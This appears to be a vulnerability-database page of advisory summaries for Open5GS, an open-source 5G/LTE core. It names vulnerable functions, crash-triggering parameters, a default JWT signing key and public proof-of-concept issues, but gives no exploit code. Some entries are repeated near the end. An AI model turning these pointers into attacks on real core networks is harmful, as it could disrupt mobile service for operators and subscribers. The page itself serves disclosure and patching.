Open5gs
Race condition in Open5GS AMF up to version 2.7.6 allows a remote, low-privileged attacker to trigger concurrent NGAP Security Mode Command processing in gmm_state_security_mode (src/amf/gmm-sm.c), resulting in low availability impact. Publicly available exploit code exists (N2-SMC-Concurrent.zip), though no evidence of active exploitation was identified at time of analysis, and this CVE is not listed in CISA KEV. Notably, the associated fix PR (#4501) addresses a broader NGAP identity-scoping flaw - where the AMF accepted UE-associated NGAP messages from any gNB regardless of which gNB originally registered the UE - suggesting the underlying attack surface may exceed what the formal CVSS score of 3.1 captures.
Authentication bypass in Open5GS versions up to 2.7.6 allows remote attackers to manipulate UE security capabilities through the AMF's NGAP PathSwitchRequest message handler in src/amf/ngap-handler.c. The flaw stems from the AMF blindly overwriting locally stored UE 5G security capabilities with values received from a target gNB during a path switch, violating 3GPP TS 33.501 6.7.3.1. Publicly available exploit code exists, though no active exploitation was identified at time of analysis.
Denial of service in Open5GS up to version 2.7.7 is triggerable by a low-privileged remote attacker via the `ogs_pool_id_calloc` function in the SBI nghttp2-server library, causing availability degradation of 5G core network functions. The CVSS temporal modifiers confirm both a public proof-of-concept (E:P) and an official remedy (RL:O). No active exploitation was identified at time of analysis and the CVE is not listed in CISA KEV, but the publicly available PoC on GitHub (issue #4474) materially lowers the exploitation barrier for actors with access to SBI endpoints.
Timer pool exhaustion in Open5GS up to 2.7.7 allows an authenticated remote attacker with low privileges to crash the UE authentication service via rapid HTTP/2 stream resets against the ue-authentications SBI endpoint. The root cause is CWE-404: response timers for outbound SBI transactions are not released when the originating inbound HTTP/2 stream closes prematurely (via RST_STREAM or connection drop), causing the timer pool to exhaust when a peer resets streams rapidly while upstream network functions are slow or unresponsive. No active exploitation was identified at time of analysis and the CVE is not listed in CISA KEV, but publicly available exploit code exists via GitHub issue #4473, and an upstream fix is available in PR #4578.
Denial-of-service via reachable assertion in Open5GS NRF (Network Repository Function) up to version 2.7.7 allows an authenticated low-privilege network peer to crash the NRF process with SIGABRT by submitting a crafted NFProfile registration payload with oversized inner-list arrays in SMF or AMF info sections. The NRF is a critical singleton service registry in 5G Service-Based Architecture - crashing it disrupts NF discovery for the entire 5G core, making the practical operational impact greater than the A:L CVSS impact rating alone suggests. Publicly available exploit code exists (GitHub issue #4469 and CVSS temporal E:P), though no confirmed active exploitation via CISA KEV has been recorded at time of analysis.
Out-of-bounds write in Open5GS versions up to 2.7.7 allows a remote, low-privileged attacker to crash the NRF (Network Repository Function) component by sending a malformed SCP info payload, resulting in a denial-of-service condition. The vulnerability resides in the handle_scp_info function within the Shared NF-profile Parser (lib/sbi/nnrf-handler.c), a critical parsing path for 5G service-based interface communication. A public proof-of-concept exploit has been disclosed via the project's GitHub issue tracker, materially lowering the bar for exploitation against unpatched deployments.
Denial of service in Open5GS NRF (Network Repository Function) through version 2.7.7 allows an authenticated network peer to crash the NRF process with SIGABRT by submitting a crafted SMF or AMF NF-profile registration containing oversized inner-loop arrays. The NRF's shared NF-profile parser in lib/sbi/nnrf-handler.c used reachable ogs_assert() calls - rather than graceful bounds checks - to enforce limits on DNN entries per S-NSSAI slice and TAC range entries per TAI range, making them triggerable by peer-supplied payloads. Publicly available exploit code exists (GitHub issue #4467); the CVSSv4 score of 2.1 reflects scoped low-availability impact but understates operational risk given the NRF's central role in 5G core service discovery.
Use-after-free vulnerability in Open5GS NRF component (versions up to 2.7.7) allows authenticated remote attackers to trigger denial of service via the discover_handler function in nghttp2-server.c. Publicly available exploit code exists (GitHub issue #4476), but the vendor has not responded to early disclosure. EPSS data not available; CVSS 4.3 (Medium) reflects limited scope (DoS only, authenticated access required). Not listed in CISA KEV, indicating no confirmed widespread exploitation despite the public PoC.
Remote authenticated denial of service in Open5GS versions up to 2.7.7 allows attackers to crash the AUSF (Authentication Server Function) component via crafted timer manipulation. The vulnerability resides in the ogs_timer_add function within nausf-handler.c. Public exploit code exists via GitHub issue #4472, though the vendor has not responded to disclosure. EPSS data unavailable; CVSS 4.0 scores only 2.1 due to low availability impact and the authentication requirement, but the existence of a public exploit elevates practical risk for exposed 5G core deployments.
Denial of service in Open5GS NRF (Network Repository Function) allows authenticated remote attackers to crash the service by exhausting the nf_service resource pool. Open5GS versions up to 2.7.7 fail to validate pool allocation during NF service registration, triggering assertion failures that terminate the process. Publicly available exploit code exists (GitHub issue #4466). EPSS data not available, not listed in CISA KEV. Patch released via commit 819db11a08b9736a3576c4f99ceb28f7eb99523a, merged in PR #4534.
Improper authorization in Open5GS AMF/MME component (versions up to 2.7.6) allows authenticated network attackers to manipulate NGAP user context lookups, potentially accessing or interfering with other users' 5G/LTE sessions. The vulnerability stems from insufficient validation of AMF_UE_NGAP_ID and RAN_UE_NGAP_ID pairs in the ran_ue_find_by_amf_ue_ngap_id function, enabling attackers with low-level network privileges to bypass session-to-base-station association controls. Publicly available exploit code exists (GitHub issue #4498), and a vendor-released patch (commit 5746b857) is available. CVSS 6.3 (Medium) reflects network vector with low attack complexity but requires authentication.
Denial of service vulnerability in Open5GS NRF client management (versions ≤2.7.7) allows authenticated remote attackers to crash the Network Repository Function service via malformed client pool arguments. Public exploit code exists (GitHub issue #4464), but the vendor has not responded to disclosure. CVSS base score of 4.3 reflects low severity due to limited availability impact and the authentication requirement. EPSS data not provided; KEV status not applicable for this unpatched issue.
Denial of service in Open5GS versions up to 2.7.6 allows authenticated remote attackers to crash the Network Repository Function (NRF) component via crafted nfInstanceId parameter manipulation in the ogs_sbi_nf_instance_set_id function. Publicly available exploit code exists (GitHub issue #4462), but the vendor has not responded to early responsible disclosure. EPSS data not available, not listed in CISA KEV. CVSS 4.3 (Medium) reflects low impact (availability only) and an authenticated attack vector.
Denial of service in Open5GS versions up to 2.7.7 allows authenticated remote attackers to crash the Network Repository Function (NRF) component by manipulating service-names or snssais parameters in SBI messages. A public proof-of-concept exploit exists via GitHub issue #4460, and the vendor has not responded to the early disclosure. EPSS data unavailable, but the low CVSS 4.3 score reflects limited impact (availability only, authenticated access required), reducing real-world urgency for most deployments.
Denial of service in Open5GS versions up to 2.7.7 allows authenticated remote attackers to crash the Network Repository Function (NRF) component via malformed target-plmn-list parameters. The vulnerability targets a parsing function in the Service-Based Interface (SBI) library and has publicly available exploit code (GitHub issue #4458). CVSS 4.3 reflects low severity, but the vendor has not responded to early disclosure attempts, leaving no confirmed patch timeline. EPSS and KEV data unavailable - exploitation likelihood beyond POC unknown.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the NRF component by manipulating the hnrf-uri argument passed to the yuarel_parse function in /lib/sbi/conv.c. The vulnerability has a publicly available exploit and low CVSS score (4.3) due to authentication requirement and limited scope, but affects a critical 5G network function with potential operational impact.
Denial of service in Open5GS NRF component up to version 2.7.7 allows remote authenticated attackers to exhaust the nf_service memory pool via the ogs_nnrf_nfm_handle_nf_profile function, causing the process to abort via failed assertion. Publicly available exploit code exists, and a vendor patch is available but awaits acceptance into the main branch.
Denial of service in Open5GS through version 2.7.7 allows authenticated remote attackers to crash the Session Management Function (SMF) by manipulating the smf_nsmf_handle_update_data_in_vsmf function in nsmf-handler.c. Publicly available exploit code exists, and the project maintainers have not yet responded to the early disclosure notification despite awareness of the issue.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the Session Management Function (SMF) by manipulating the qosFlowProfile argument in the smf_nsmf_handle_update_data_in_vsmf function. Publicly available exploit code exists, and the vulnerability affects the 5G core network's ability to manage quality-of-service parameters, though the project maintainers have not yet responded to early disclosure.
Denial of service in Open5GS SMF (Session Management Function) via crafted PDU Session Modification messages allows remote authenticated attackers to trigger unvalidated parameter processing in gsm_handle_pdu_session_modification_qos_flow_descriptions(), causing service disruption. The vulnerability stems from insufficient pre-validation of QoS flow parameter identifiers and bitrate units before state mutation, potentially leaving the SMF in an inconsistent state. Publicly available exploit code exists, and a fix awaits upstream acceptance in PR #4513.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the Session Management Function (SMF) via manipulation of QoS rule parsing in the ogs_nas_parse_qos_rules function. The vulnerability has a low CVSS score of 2.1 but public exploit code is available; however, exploitation requires prior authentication and causes only availability impact without confidentiality or integrity compromise.
Denial of service vulnerability in Open5GS up to version 2.7.7 affects the SMF (Session Management Function) component's smf_nsmf_handle_create_sm_context function, allowing authenticated remote attackers to crash or degrade the 5G core network service through malformed session context creation requests. Public exploit code exists and the vulnerability has low real-world severity (CVSS 2.1) due to requirement for authenticated access and availability impact only, though active 5G infrastructure targeting remains a concern given the critical nature of SMF in telecom deployments.
Denial of service in Open5GS up to version 2.7.7 affects the SMF component's OpenAPI_list_create function, allowing authenticated remote attackers to cause service unavailability through resource manipulation. The vulnerability has low to moderate severity (CVSS 4.3) with publicly disclosed proof-of-concept code, though the vendor has not yet responded to early disclosure notification.
Remote authenticated denial of service in Open5GS up to version 2.7.7 affects the SMF (Session Management Function) component, specifically in the smf_nsmf_handle_created_data_in_vsmf function. An authenticated attacker can remotely trigger a denial of service condition by sending crafted requests. Public exploit code is available (CVE-2026-8267 GitHub issue #4448), though the vendor has not yet released a patched version despite early notification.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the Session Management Function (SMF) via manipulation of the PDU session establishment acceptance function, resulting in service unavailability. The CVSS score of 4.3 reflects low severity due to authentication requirements and availability-only impact, though publicly available exploit code exists and the vulnerability has been reported to the project without acknowledged response.
Null pointer dereference in Open5GS Session Management Function (SMF) up to version 2.7.7 allows authenticated remote attackers to cause denial of service by manipulating the smf_nsmf_handle_create_data_in_hsmf function. Publicly available exploit code exists, and the project has been notified but has not yet released a patch.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the Session Management Function (SMF) component via manipulation of the update_authorized_pcc_rule_and_qos function in the Policy and Charging Control (PCC) handler. The vulnerability has a CVSS score of 2.1 with low availability impact; publicly available exploit code exists, and the project maintainers have not yet responded to early disclosure.
Denial of service in Open5GS up to version 2.7.7 via the smf_n4_build_qos_flow_to_modify_list function in the SMF (Session Management Function) component allows remote authenticated attackers to crash the service with low attack complexity. The vulnerability has been publicly disclosed with exploit code available; the vendor was notified early but has not yet released a fix.
Denial of service vulnerability in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the Session Management Function (SMF) component via improper handling in the update_authorized_pcc_rule_and_qos function. The vulnerability has a publicly available exploit and moderate CVSS score (4.3) but is limited to authenticated access and results in availability impact only. The vendor has not yet released a patch despite early notification through a GitHub issue.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the Session Management Function (SMF) component via manipulation of the update_authorized_pcc_rule_and_qos function in npcf-handler.c. Publicly available exploit code exists, and the vendor has not released a patch despite early notification through issue tracking.
Denial of service vulnerability in Open5GS up to version 2.7.7 allows remote unauthenticated attackers to crash the service by triggering improper exception handling in the ogs_pcc_rule_install_flow_from_media function within the PCC rule processing library. Publicly available exploit code exists, and the project maintainers have not responded to the early notification despite issue tracking.
Denial of service in Open5GS up to version 2.7.7 allows remote unauthenticated attackers to crash the Policy Control Function (PCF) by manipulating the SmPolicyContextData.ipv6AddressPrefix parameter in the pcf_sess_set_ipv6prefix function. The vulnerability has publicly available exploit code and was disclosed despite vendor non-responsiveness, making it a known attack vector against 5G service provider infrastructure.
Denial of service in Open5GS up to version 2.7.7 via manipulation of the pcf_sess_sbi_discover_and_send function in the sm-policies endpoint allows remote unauthenticated attackers to disrupt service availability. Publicly available exploit code exists, and the upstream project has not yet issued a patch despite early notification via issue report.
Remote denial of service in Open5GS up to version 2.7.7 affects the sm-policies endpoint's pcf_nbsf_management_handle_register function, allowing unauthenticated network attackers to trigger a crash or service disruption with low attack complexity. Publicly available exploit code exists and the vendor was notified early but has not released a fix.
Denial of service in Open5GS up to version 2.7.7 allows remote unauthenticated attackers to crash the Policy Control Function (PCF) service by sending crafted requests to the delete endpoint in the SM policy control handler (pcf_npcf_smpolicycontrol_handle_delete). The vulnerability has a publicly available proof of concept and impacts the availability of 5G network policy enforcement, though the vendor has not yet released a patch despite early notification.
Out-of-bounds read in Open5GS up to version 2.7.7 allows remote attackers to trigger information disclosure via manipulation of the ogs_sbi_client_send_via_scp_or_sepp function in lib/sbi/client.c during Service-Based Interface (SBI) communication. The vulnerability exploits improper bounds checking when extracting paths from URIs, affecting the Network Function (NF) component. CVSS 6.9 (network-accessible, low complexity, no privileges required) with availability impact. Upstream patch commit d5bc487fcf9ea87d2b03f2ef95123af344773bfb available.
Denial of service in Open5GS User Plane Function (UPF) up to version 2.7.7 allows remote, unauthenticated attackers to exhaust server resources through manipulation of GTPv1-U packet handling in the _gtpv1_u_recv_cb function. The vulnerability enables resource consumption attacks against 5G core network infrastructure without requiring authentication or user interaction. Vendor notification occurred via GitHub issue #4492 but has not received developer response or a released patch.
Denial of service in Open5GS up to version 2.7.7 affects the NSSF component's ogs_sbi_discovery_option_add_snssais function, allowing authenticated remote attackers to crash the service via a network request. The vulnerability has been publicly disclosed with exploit code available on GitHub, though the vendor has not yet responded to early notification.
Denial of service vulnerability in Open5GS up to version 2.7.7 affects the NSSF component's service discovery function, allowing remote authenticated attackers to cause availability impact through manipulation of the ogs_sbi_discovery_option_add_service_names function. Public exploit code exists and the vulnerability carries low CVSS score (2.1) reflecting limited impact scope, though the project has not yet responded to early notification.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the NSSF (Network Slice Selection Function) component via a crafted PLMN list in the SBI (Service Based Interface) parser. The vulnerability exists in the ogs_sbi_parse_plmn_list function within /lib/sbi/conv.c and has been publicly disclosed with exploit code available; the vendor has not yet released a patch despite early notification.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to manipulate the NSSF network selection function via the nssf_nnrf_nsselection_handle_get_from_amf_or_vnssf handler in /src/nssf/nnssf-handler.c, causing service unavailability. Public exploit code exists and the vulnerability has been reported to the project, though no patch has been released as of analysis time.
Denial of service in Open5GS up to version 2.7.7 affects the NSSF component's stream identification function in the nghttp2-server library. Local authenticated attackers can manipulate the ogs_sbi_stream_find_by_id function to cause service unavailability. Publicly available exploit code exists, though the vendor has not yet responded to early disclosure notification.
Denial of service in Open5GS up to version 2.7.7 affects the AMF 3GPP access endpoint handler (udm_nudm_uecm_handle_amf_registration_update function), allowing authenticated remote attackers to crash the UDM service via malformed registration update messages. Publicly available exploit code exists, and the vendor was notified early but has not released a patch as of the analysis date.
Denial of service in Open5GS up to version 2.7.7 affects the udm_state_operational function in the smf-registrations endpoint, allowing authenticated remote attackers to manipulate the function and cause service unavailability. The vulnerability has publicly available exploit code and carries a low CVSS score of 2.1 due to required authentication and limited availability impact, though the project has not yet responded to early disclosure.
Denial of service in Open5GS up to version 2.7.7 affects the authentication-subscription endpoint handler, allowing authenticated remote attackers to manipulate the udm_nudr_dr_handle_subscription_authentication function and cause service unavailability. Public exploit code exists and the vulnerability has been reported to the project without a confirmed vendor response or patch release.
Denial of service in Open5GS UDR component up to version 2.7.7 allows authenticated remote attackers to crash the subscription data service by manipulating the supi_id argument to the ogs_dbi_subscription_data function. Publicly available exploit code exists, and the vendor has been notified via issue report but has not yet released a patch.
Denial of service in Open5GS UDR component (versions up to 2.7.7) via malformed pei argument in udr_nudr_dr_handle_subscription_context function allows authenticated remote attackers to crash the User Data Repository service with low complexity. Publicly available exploit code exists; the vendor has not responded to early notification.
Denial of service in Open5GS versions up to 2.7.7 allows authenticated remote attackers to crash the AMF (Access and Mobility Management Function) component by exploiting improper error handling in the gmm_handle_service_request function. The vulnerability requires low-privilege authentication to trigger and results in service unavailability. A public exploit has been disclosed via GitHub issue tracker, though the vendor has not yet released a patch despite early notification.
Denial of service in Open5GS AMF (Access and Mobility Management Function) up to version 2.7.6 allows authenticated remote attackers to cause service unavailability by sending crafted registration requests with manipulated reg_type arguments. The vulnerability exists in the GMM (Mobility Management) handler due to insufficient validation of registration type values, potentially triggering null pointer dereferences or assertion failures. Vendor-released patch version 2.7.7 is available.
Denial of service in Open5GS AMF component up to version 2.7.7 allows authenticated remote attackers to trigger resource exhaustion via improper handling of PDU session context update messages in the amf_nsmf_pdusession_handle_update_sm_context function. The vulnerability has a low CVSS score (2.1) but publicly available exploit code exists; however, exploitation requires prior authentication to the 5G network, significantly limiting real-world attack surface.
Denial of service in Open5GS up to version 2.7.7 affects the AMF (Access and Mobility Management Function) component, specifically the ogs_id_get_value function in nudm-handler.c, allowing remote authenticated attackers to cause service unavailability. Publicly available exploit code exists, and the vulnerability has been reported to the project via GitHub issue #4405 without vendor acknowledgment or patch release at time of analysis.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the AMF (Access and Mobility Management Function) component via manipulation of the amf_nudm_sdm_handle_provisioned function in the NUDM handler. The vulnerability has publicly available exploit code and affects the authentication and mobility management core of 5G networks, requiring valid credentials to trigger but resulting in service unavailability. Public disclosure has occurred without vendor remediation at the time of analysis.
Denial of service in Open5GS up to version 2.7.7 allows authenticated remote attackers to crash the BSF (Binding Support Function) component by manipulating the ipv6Prefix argument in the bsf_sess_find_by_ipv6prefix function. The vulnerability has a low CVSS score of 2.1 due to requiring authentication and causing only availability impact, but publicly available exploit code exists and the vendor has not yet responded to early disclosure.
Denial of service in Open5GS up to version 2.7.7 allows remote unauthenticated attackers to crash the BSF (Binding Support Function) service by manipulating the ipv4Addr parameter in the /nbsf-management/v1/pcfBindings endpoint. The vulnerability has publicly available exploit code and affects a core 5G network function, creating operational risk for mobile networks relying on this open-source implementation.
Denial of service in Open5GS 2.7.6 via malformed CCA (Credit-Control-Answer) messages in the SMF (Session Management Function) component allows remote attackers to crash the service without authentication. The vulnerability affects the smf_gx_cca_cb, smf_gy_cca_cb, and smf_s6b functions in the CCA Message Handler, with publicly available exploit code demonstrating the attack despite high complexity requirements. CVSS 6.3 reflects the availability impact and remote attack vector, though exploitation requires crafted network conditions.
Denial of service in Open5GS through version 2.7.6 affects the CCA Handler component's callback functions, allowing unauthenticated remote attackers to crash the service. Public exploit code is available for this vulnerability. Upgrading to version 2.7.7 resolves the issue.
Open5GS 2.7.6 is vulnerable to denial of service through improper handling of S11 session response messages in the MME component, allowing remote unauthenticated attackers to crash the service. Public exploit code exists for this vulnerability, and the vendor has not yet provided a patch despite early notification.
Open5GS versions up to 2.7.6 are vulnerable to a denial of service condition in the SMF component's PDP context request handler, which can be triggered remotely without authentication. An attacker can exploit this reachable assertion flaw to crash the service, and public exploit code is currently available. No patch has been released by the project despite early notification of the issue.
Memory corruption in Open5GS up to version 2.7.6 allows remote attackers to cause denial of service through manipulation of the MME component's esm-build.c file. Public exploit code exists for this vulnerability, and the Open5GS project has not yet released a patch despite early notification.
Memory corruption in Open5GS versions up to 2.7.6 allows remote attackers to trigger a denial of service condition by manipulating the SGW-C session creation handler, with public exploit code already available. The vulnerability requires no authentication or user interaction and currently lacks a vendor patch, leaving affected deployments vulnerable to remote availability attacks.
Open5GS versions up to 2.7.6 are vulnerable to a denial of service attack in the SMF component's TFT parsing function when a crafted packet manipulates the traffic filter content length parameter. An unauthenticated remote attacker can trigger this flaw to crash the service, and public exploit code exists with no patch currently available.
Open5GS versions up to 2.7.6 suffer from a null pointer dereference in the PGW S5U Address Handler component that can be triggered remotely without authentication, resulting in denial of service. Public exploit code exists for this vulnerability, and administrators should apply the available patch immediately.
A security flaw has been discovered in Open5GS up to 2.7.6. Affected by this vulnerability is the function hss_ogs_diam_cx_mar_cb of the file src/hss/hss-cx-path.c of the component VoLTE Cx-Test. [CVSS 7.3 HIGH]
Remote denial of service in Open5GS up to version 2.7.6 allows unauthenticated attackers to trigger a reachable assertion in the SGWC component by manipulating PDR arguments in the sgwc_tunnel_add function. Public exploit code exists for this vulnerability, and no patch is currently available despite reports indicating a fix is planned.
Open5GS versions up to 2.7.6 contain a reachable assertion vulnerability in the CreateBearerRequest handler that allows unauthenticated remote attackers to trigger a denial of service condition. Public exploit code exists for this vulnerability, and no patch is currently available. The impact is limited to service availability, with a CVSS score of 5.3.
Open5GS versions up to 2.7.6 contain a reachable assertion vulnerability in the SGWC S11 handler that can be triggered remotely without authentication to cause a denial of service. Public exploit code exists for this vulnerability, and while the issue is reported as already fixed upstream, no patch is yet available for affected deployments.
Denial of service in Open5GS up to version 2.7.6 allows remote attackers to crash the SGWC service by manipulating the Modify Bearer Request handler in s11-handler.c. Public exploit code exists for this vulnerability and no patch is currently available. Organizations running affected versions should apply updates as they become available and consider network-level mitigations to restrict access to the S11 interface.
Remote denial of service in Open5GS up to version 2.7.5 affects the SGWC component's TEID-to-IP conversion function, allowing unauthenticated attackers to crash the service over the network. Public exploit code exists for this vulnerability, and while a fix has been developed, no official patch is currently available for affected deployments.
Remote denial of service in Open5GS up to version 2.7.6 affects the SGWC component's bearer response handler, allowing unauthenticated attackers to crash the service over the network. Public exploit code exists for this vulnerability, though a patch (commit b19cf6a) is available to resolve it.
Remote denial of service in Open5GS up to version 2.7.6 allows unauthenticated attackers to crash the SGWC component by manipulating bearer resource failure indication messages. Public exploit code exists for this vulnerability, and a patch is available in commit 69b53add90a9479d7960b822fc60601d659c328b.
Open5gs WebUI authentication can be bypassed by attackers who exploit the default hardcoded JWT signing key ("change-me") that is used when the JWT_SECRET_KEY environment variable is not configured. An attacker can forge valid JWT tokens to gain unauthorized access to the WebUI with limited confidentiality and integrity impacts. A patch is available to remediate this vulnerability by enforcing proper key configuration or using secure defaults.
A vulnerability was determined in Open5GS up to 2.7.6. Impacted is the function sgwc_s11_handle_downlink_data_notification_ack of the file src/sgwc/s11-handler.c of the component sgwc. [CVSS 5.3 MEDIUM]
A security flaw has been discovered in Open5GS up to 2.7.5. This issue affects some unknown processing of the component Timer Handler. [CVSS 5.3 MEDIUM]
A vulnerability was identified in Open5GS up to 2.7.5. This vulnerability affects the function sgwc_bearer_add of the file src/sgwc/context.c. [CVSS 5.3 MEDIUM]
A vulnerability was determined in Open5GS up to 2.7.6. This affects the function sgwc_s11_handle_create_indirect_data_forwarding_tunnel_request of the file /src/sgwc/s11-handler.c. [CVSS 5.3 MEDIUM]
A vulnerability was found in Open5GS up to 2.7.6. Affected by this issue is the function sgwc_s5c_handle_create_session_response of the file src/sgwc/s5c-handler.c. [CVSS 5.3 MEDIUM]
A vulnerability has been found in Open5GS up to 2.7.6. Affected by this vulnerability is an unknown functionality of the component GTPv2 Bearer Response Handler. [CVSS 5.3 MEDIUM]
A weakness has been identified in Open5GS up to 2.7.6. Affected by this issue is the function sgwc_s5c_handle_create_session_response of the file src/sgwc/s5c-handler.c of the component GTPv2-C Flow Handler. [CVSS 3.3 LOW]
A security flaw has been discovered in Open5GS up to 2.7.6. Affected by this vulnerability is the function ogs_gtp2_parse_bearer_qos in the library lib/gtp/v2/types.c of the component Bearer QoS IE Length Handler. [CVSS 3.3 LOW]
A vulnerability was identified in Open5GS up to 2.7.6. Affected is the function sgwc_s11_handle_create_session_request of the file src/sgwc/s11-handler.c of the component GTPv2-C F-TEID Handler. [CVSS 3.3 LOW]
Improper initialization in the PFCP handler function ogs_pfcp_handle_create_pdr within Open5GS up to version 2.7.5 allows remote attackers to trigger information disclosure with high attack complexity. The vulnerability has a publicly available proof-of-concept and carries a very low EPSS score (0.15%), indicating minimal real-world exploitation probability despite public availability of exploit code. CVSS 2.9 reflects the limited technical impact (confidentiality only), but the high complexity and resource requirements make practical attacks difficult.
Reachable assertion in Open5GS up to version 2.7.6 affects the PFCP context management functions (PDR, FAR, URR, QER) in lib/pfcp/context.c, allowing remote attackers to trigger a denial of service condition via crafted PFCP messages. The vulnerability requires high attack complexity and has low availability impact, but publicly available exploit code exists. CVSS 2.9 / EPSS 0.14% indicates low real-world exploitation probability despite public POC.
Null pointer dereference in Open5GS up to version 2.7.5 allows remote authenticated attackers to cause denial of service by sending manipulated PFCP (Packet Forwarding Control Protocol) packets that trigger improper handling in the FAR-ID handler component. The vulnerability requires high attack complexity and authenticated access, limiting real-world exploitation despite publicly available proof-of-concept code and a low CVSS score of 1.3 reflecting restricted impact scope.
In Open5GS 2.7.6, the AMF crashes when it receives an abnormal NGSetupRequest message, resulting in denial of service. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable with no authentication required and low attack complexity. This uncontrolled resource consumption vulnerability could allow attackers to cause denial of service by exhausting system resources.
Open5GS v2.7.5, prior to commit 67ba7f92bbd7a378954895d96d9d7b05d5b64615, is vulnerable to a NULL pointer dereference when a multipart/related HTTP POST request with an empty HTTP body is sent to the. Rated medium severity (CVSS 4.0), this vulnerability requires no authentication and has low attack complexity. Public exploit code is available.
An issue in Open5GS v2.7.2 and before allows a remote attacker to cause a denial of service via a crafted Create Session Request message to the SMF (PGW-C), using the IP address of a legitimate UE in. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable with no authentication required and low attack complexity. Public exploit code is available and no vendor patch is available.
Assertion failure in the function ngap_build_downlink_nas_transport in file src/amf/ngap-build.c, in the Access and Mobility Management Function (AMF) component, in Open5GS through 2.7.5, allowing attackers to. Rated high severity (CVSS 7.5), this vulnerability is remotely exploitable with no authentication required and low attack complexity. Public exploit code is available.
A security flaw has been discovered in Open5GS up to 2.7.5. Rated medium severity (CVSS 5.5), this vulnerability is remotely exploitable with no authentication required and low attack complexity. Public exploit code is available.
A vulnerability was determined in Open5GS up to 2.7.5. Rated medium severity (CVSS 5.5), this vulnerability is remotely exploitable with no authentication required and low attack complexity. Public exploit code is available.
A vulnerability was found in Open5GS up to 2.7.5. Rated medium severity (CVSS 5.5), this vulnerability is remotely exploitable with no authentication required and low attack complexity. Public exploit code is available.
Denial-of-service via reachable assertion in Open5GS NRF (Network Repository Function) up to version 2.7.7 allows an authenticated low-privilege network peer to crash the NRF process with SIGABRT by submitting a crafted NFProfile registration payload with oversized inner-list arrays in SMF or AMF info sections. The NRF is a critical singleton service registry in 5G Service-Based Architecture - crashing it disrupts NF discovery for the entire 5G core, making the practical operational impact greater than the A:L CVSS impact rating alone suggests. Publicly available exploit code exists (GitHub issue #4469 and CVSS temporal E:P), though no confirmed active exploitation via CISA KEV has been recorded at time of analysis.
Out-of-bounds write in Open5GS versions up to 2.7.7 allows a remote, low-privileged attacker to crash the NRF (Network Repository Function) component by sending a malformed SCP info payload, resulting in a denial-of-service condition. The vulnerability resides in the handle_scp_info function within the Shared NF-profile Parser (lib/sbi/nnrf-handler.c), a critical parsing path for 5G service-based interface communication. A public proof-of-concept exploit has been disclosed via the project's GitHub issue tracker, materially lowering the bar for exploitation against unpatched deployments.
Denial of service in Open5GS NRF (Network Repository Function) through version 2.7.7 allows an authenticated network peer to crash the NRF process with SIGABRT by submitting a crafted SMF or AMF NF-profile registration containing oversized inner-loop arrays. The NRF's shared NF-profile parser in lib/sbi/nnrf-handler.c used reachable ogs_assert() calls - rather than graceful bounds checks - to enforce limits on DNN entries per S-NSSAI slice and TAC range entries per TAI range, making them triggerable by peer-supplied payloads. Publicly available exploit code exists (GitHub issue #4467); the CVSSv4 score of 2.1 reflects scoped low-availability impact but understates operational risk given the NRF's central role in 5G core service discovery.
Use-after-free vulnerability in the Open5GS NRF component (versions up to 2.7.7) allows authenticated remote attackers to trigger denial of service via the discover_handler function in nghttp2-server.c. Publicly available exploit code exists (GitHub issue #4476), but the vendor has not responded to early disclosure. EPSS data not available; CVSS 4.3 (Medium) reflects limited scope (DoS only, authenticated access required). Not listed in CISA KEV, indicating no confirmed widespread exploitation despite public POC.
Remote authenticated denial of service in Open5GS versions up to 2.7.7 allows attackers to crash the AUSF (Authentication Server Function) component via crafted timer manipulation. The vulnerability resides in the ogs_timer_add function within nausf-handler.c. Public exploit code exists via GitHub issue #4472, though the vendor has not responded to disclosure. EPSS data unavailable; CVSS 4.0 scores only 2.1 due to low availability impact and the authentication requirement, but the existence of a public exploit elevates practical risk for exposed 5G core deployments.
Denial of service in Open5GS NRF (Network Repository Function) allows authenticated remote attackers to crash the service by exhausting the nf_service resource pool. Open5GS versions up to 2.7.7 fail to validate pool allocation during NF service registration, triggering assertion failures that terminate the process. Publicly available exploit code exists (GitHub issue #4466). EPSS data not available, not listed in CISA KEV. Patch released via commit 819db11a08b9736a3576c4f99ceb28f7eb99523a, merged in PR #4534.
Improper authorization in Open5GS AMF/MME component (versions up to 2.7.6) allows authenticated network attackers to manipulate NGAP user context lookups, potentially accessing or interfering with other users' 5G/LTE sessions. The vulnerability stems from insufficient validation of AMF_UE_NGAP_ID and RAN_UE_NGAP_ID pairs in the ran_ue_find_by_amf_ue_ngap_id function, enabling attackers with low-level network privileges to bypass session-to-base-station association controls. Publicly available exploit code exists (GitHub issue #4498), and a vendor-released patch (commit 5746b857) is available. CVSS 6.3 (Medium) reflects network vector with low attack complexity but requires authentication.
Denial of service vulnerability in Open5GS NRF client management (versions ≤2.7.7) allows authenticated remote attackers to crash the Network Repository Function service via malformed client pool arguments. Public exploit code exists (GitHub issue #4464), but the vendor has not responded to disclosure. CVSS base score of 4.3 reflects low severity due to limited availability impact and the authentication requirement. EPSS data not provided; KEV status not applicable for this unpatched issue.
Denial of service in Open5GS versions up to 2.7.6 allows authenticated remote attackers to crash the Network Repository Function (NRF) component via crafted nfInstanceId parameter manipulation in the ogs_sbi_nf_instance_set_id function. Publicly available exploit code exists (GitHub issue #4462), but vendor has not responded to early responsible disclosure. EPSS data not available, not listed in CISA KEV. CVSS 4.3 (Medium) reflects low impact (availability only) and authenticated attack vector.
Denial of service in Open5GS versions up to 2.7.7 allows authenticated remote attackers to crash the Network Repository Function (NRF) component by manipulating service-names or snssais parameters in SBI messages. A public proof-of-concept exploit exists via GitHub issue #4460, and the vendor has not responded to the early disclosure. EPSS data unavailable, but the low CVSS 4.3 score reflects limited impact (availability only, authenticated access required), reducing real-world urgency for most deployments.
